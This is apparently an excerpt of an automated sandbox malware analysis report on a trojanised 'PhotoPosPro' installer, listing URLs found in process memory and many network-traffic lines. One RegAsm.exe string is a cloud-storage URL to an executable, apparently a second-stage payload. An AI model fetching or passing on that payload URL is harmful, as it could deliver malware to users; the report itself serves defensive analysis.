                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3109776794.00000202D1012000.00000002.00000001.01000000.00000022.sdmp, Photo Pos Pro 4.exe, 0000001E.00000002.2987690943.00000202B5AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jam-software.com/developer/index.shtml
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3114655910.00000202D1212000.00000002.00000001.01000000.00000023.sdmp, Photo Pos Pro 4.exe, 0000001E.00000002.2987690943.00000202B5AD1000.00000004.00000800.00020000.00000000.sdmp, Photo Pos Pro 4.exe, 0000001E.00000002.2987690943.00000202B5E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.photopos.com
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3114655910.00000202D1212000.00000002.00000001.01000000.00000023.sdmp, Photo Pos Pro 4.exe, 0000001E.00000002.2987690943.00000202B5AD1000.00000004.00000800.00020000.00000000.sdmp, Photo Pos Pro 4.exe, 0000001E.00000002.2987690943.00000202B5E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx
                  Source: PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000003.2282579248.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000002.2284109613.000000000072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=After
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3114655910.00000202D1212000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=Downl
                  Source: PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000002.2284207198.000000000074D000.00000004.00000020.00020000.00000000.sdmp, PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000003.2283121035.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photopos.com/Pos_Privacy_Policy_Application.asp
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3114655910.00000202D1212000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://www.photopos.com/WhyAmISeenThis.asp
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: PhotoPosPro4_SetUp.exe, 00000006.00000002.2288900581.0000000000484000.00000002.00000001.01000000.00000009.sdmp, PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000002.2283774709.0000000000484000.00000002.00000001.01000000.0000000B.sdmp, PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000003.2178979849.00000000055D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.thraexsoftware.com
                  Source: PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000003.2178979849.00000000055D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.thraexsoftware.comThraex
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3097078723.00000202CF960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3ks
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3097078723.00000202CF960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmects
                  Source: powershell.exe, 00000010.00000002.2238400859.00000275D80A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1936741997.000001F10BF41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000014.00000002.1951469907.000001F11BFB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000014.00000002.1951469907.000001F11BFB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000014.00000002.1951469907.000001F11BFB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filekg-download-01.fra1.cdn.digitaloceanspaces
                  Source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002BA7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2982481428.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filekg-download-01.fra1.cdn.digitaloceanspaces.com
                  Source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002956000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2982481428.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filekg-download-01.fra1.cdn.digitaloceanspaces.com/Wpmutnro.exe
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDCC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDCC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDCA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDCC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: powershell.exe, 00000014.00000002.1936741997.000001F10C168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: powershell.exe, 00000010.00000002.2506223043.00000275E8112000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951469907.000001F11BFB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDCC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RegAsm.exe, 0000001D.00000002.2982481428.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2727036989.0000000002751000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmp, smcdll.exe, 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3114655910.00000202D1212000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/PPP3WebRelateds/PPPWebTypes/PPPWebTy
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50326 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50293 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50281 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50351 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50338 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50304 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
